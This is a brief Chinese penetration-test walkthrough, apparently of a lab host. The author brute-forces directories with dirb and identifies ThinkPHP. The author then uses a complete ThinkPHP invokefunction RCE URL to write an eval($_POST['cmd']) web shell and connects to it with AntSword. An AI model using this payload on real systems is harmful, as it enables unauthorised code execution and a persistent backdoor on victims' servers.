目录

外网打点

先爆破一下看看有没有啥可进攻路径

尝试那个可疑的路径发现是thinkphp这个框架，同时也知道了版本，那就nday打吧 

写入php

​编辑写入php成功，简简单单nday拿下​编辑

蚁剑rce尝试链接

打点成功

---

外网打点

先爆破一下看看有没有啥可进攻路径

dirsearch,dirb,gobuster等工具都可以尝试

dirb http://192.168.20.130/

尝试那个可疑的路径发现是thinkphp这个框架，同时也知道了版本，那就nday打吧 

 写入php

http://192.168.20.130/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

写入php成功，简简单单nday拿下

蚁剑rce尝试链接

 打点成功